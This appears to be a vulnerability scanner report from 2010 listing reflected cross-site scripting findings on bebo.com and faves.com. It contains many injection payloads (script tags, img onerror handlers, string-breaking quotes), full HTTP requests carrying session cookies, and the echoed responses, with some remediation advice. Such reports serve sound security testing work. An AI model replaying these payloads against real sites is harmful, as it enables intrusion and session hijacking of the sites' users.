This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/invite29a1a'><script>alert(1)</script>8145a15ce59/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10781
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c8c29<script>alert(1)</script>c9d988c0b02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/invitec8c29<script>alert(1)</script>c9d988c0b02/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10763
Date: Mon, 15 Nov 2010 22:43:07 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
...[SNIP]... <div class="mod">ERROR 404: Sorry, we dont have no /c/invitec8c29<script>alert(1)</script>c9d988c0b02/join page, please try again.</div> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9dbcc'%3b74725b6cc49 was submitted in the REST URL parameter 2. This input was echoed as 9dbcc';74725b6cc49 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/invite9dbcc'%3b74725b6cc49/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10570
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bae'%3b0eeae6fcce9 was submitted in the REST URL parameter 3. This input was echoed as 45bae';0eeae6fcce9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/invite/join45bae'%3b0eeae6fcce9 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10294
Date: Mon, 15 Nov 2010 22:43:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e12be'><script>alert(1)</script>ba73354d12e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/invite/joine12be'><script>alert(1)</script>ba73354d12e HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10488
Date: Mon, 15 Nov 2010 22:43:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d36b9<img%20src%3da%20onerror%3dalert(1)>29fa93aced1 was submitted in the REST URL parameter 3. This input was echoed as d36b9<img src=a onerror=alert(1)>29fa93aced1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/invite/joind36b9<img%20src%3da%20onerror%3dalert(1)>29fa93aced1 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10564
Date: Mon, 15 Nov 2010 22:43:14 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a49f2"><img%20src%3da%20onerror%3dalert(1)>3514e64845a was submitted in the REST URL parameter 3. This input was echoed as a49f2"><img src=a onerror=alert(1)>3514e64845a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/invite/joina49f2"><img%20src%3da%20onerror%3dalert(1)>3514e64845a HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10582
Date: Mon, 15 Nov 2010 22:43:10 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c7b2"><img%20src%3da%20onerror%3dalert(1)>5df38fd435e was submitted in the REST URL parameter 2. This input was echoed as 4c7b2"><img src=a onerror=alert(1)>5df38fd435e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/mobebo4c7b2"><img%20src%3da%20onerror%3dalert(1)>5df38fd435e/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10821
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e41af'><script>alert(1)</script>27c3609032 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/mobeboe41af'><script>alert(1)</script>27c3609032/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10729
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1556'%3bf8f7502b114 was submitted in the REST URL parameter 2. This input was echoed as c1556';f8f7502b114 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/mobeboc1556'%3bf8f7502b114/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10527
Date: Mon, 15 Nov 2010 22:43:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c72e1<script>alert(1)</script>5aab46f2d5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/mobeboc72e1<script>alert(1)</script>5aab46f2d5e/ HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __gads=ID=1f0467ae1ad54ad4:T=1289859499:S=ALNI_MbQhi5fz7y_ZNdD_FY3zhuAH656GA; JSESSIONID=abcEhY4opCtSz7-xDNrXs; op604frontpagegum=mvt-no; bdaysession=1adec6239fa9957a482778003; __utmz=11070379.1289859453.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11070379.1993806272.1289859453.1289859453.1289859453.1; __utmc=11070379; __utmb=11070379.0.10.1289859453; bvid=aac15668-c04a-4e9c-88d0-457c07699eda|1289859489001; sessioncreate=20101115221809;
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 10720
Date: Mon, 15 Nov 2010 22:43:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/mobeboc72e1<script>alert(1)</script>5aab46f2d5e/ page, please try again.</div>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1507f<script>alert(1)</script>338e0d730eb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/share1507f<script>alert(1)</script>338e0d730eb HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: Sorry, we dont have no /c/share1507f<script>alert(1)</script>338e0d730eb page, please try again.</div>
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 66059'><script>alert(1)</script>776b7e57e15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c/share66059'><script>alert(1)</script>776b7e57e15 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e6e8"><img%20src%3da%20onerror%3dalert(1)>468561ebcf0 was submitted in the REST URL parameter 2. This input was echoed as 5e6e8"><img src=a onerror=alert(1)>468561ebcf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /c/share5e6e8"><img%20src%3da%20onerror%3dalert(1)>468561ebcf0 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98778'%3b9c2457d3915 was submitted in the REST URL parameter 2. This input was echoed as 98778';9c2457d3915 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/share98778'%3b9c2457d3915 HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c0c67'><script>alert(1)</script>6856ba7fe8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d04fe"><img%20src%3da%20onerror%3dalert(1)>f03e823eb6e was submitted in the REST URL parameter 2. This input was echoed as d04fe"><img src=a onerror=alert(1)>f03e823eb6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a2991<script>alert(1)</script>fd8b3bf9793 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Content-Length: 9166
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 22:42:52 GMT
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: lo sentimos, no hemos encontrado la página/c/sitea2991<script>alert(1)</script>fd8b3bf9793/index ¡Vuelve a intentarlo!</div>
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb28f'%3b95e646b96f6 was submitted in the REST URL parameter 2. This input was echoed as eb28f';95e646b96f6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1a5b"><img%20src%3da%20onerror%3dalert(1)>588edead6ae was submitted in the REST URL parameter 3. This input was echoed as a1a5b"><img src=a onerror=alert(1)>588edead6ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 77608<img%20src%3da%20onerror%3dalert(1)>6477631e14 was submitted in the REST URL parameter 3. This input was echoed as 77608<img src=a onerror=alert(1)>6477631e14 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd6d'%3b03cd0db8700 was submitted in the REST URL parameter 3. This input was echoed as cdd6d';03cd0db8700 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 882ca'><script>alert(1)</script>586619cfcf5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e459c'%3bc20c3c8eede was submitted in the REST URL parameter 2. This input was echoed as e459c';c20c3c8eede in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 320f6'><script>alert(1)</script>bdaacd127e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b058a"><img%20src%3da%20onerror%3dalert(1)>c3907c87272 was submitted in the REST URL parameter 2. This input was echoed as b058a"><img src=a onerror=alert(1)>c3907c87272 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fcd7c<script>alert(1)</script>c9aa4bc7a66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Response
HTTP/1.1 404 Not Found
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: es-ES
Content-Type: text/html; charset=UTF-8
Content-Length: 9571
Vary: Accept-Encoding
Date: Mon, 15 Nov 2010 22:42:51 GMT
Connection: close
X-N: S

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<div class="mod">ERROR 404: lo sentimos, no hemos encontrado la página/c/sitefcd7c<script>alert(1)</script>c9aa4bc7a66/regframe ¡Vuelve a intentarlo!</div>
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bd01"><img%20src%3da%20onerror%3dalert(1)>7c88a3e4f5a was submitted in the REST URL parameter 3. This input was echoed as 5bd01"><img src=a onerror=alert(1)>7c88a3e4f5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a6f44<img%20src%3da%20onerror%3dalert(1)>60cebd7bda9 was submitted in the REST URL parameter 3. This input was echoed as a6f44<img src=a onerror=alert(1)>60cebd7bda9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b617'%3b1efa53ce66b was submitted in the REST URL parameter 3. This input was echoed as 4b617';1efa53ce66b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0f2c'><script>alert(1)</script>ae5c2e22b9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the u request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d2c7"%3balert(1)//091fe41f8e3 was submitted in the u parameter. This input was echoed as 8d2c7";alert(1)//091fe41f8e3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Authoring.aspx?u=8d2c7"%3balert(1)//091fe41f8e3 HTTP/1.1
Host: www.faves.com
Accept: */*
Accept-Language: en
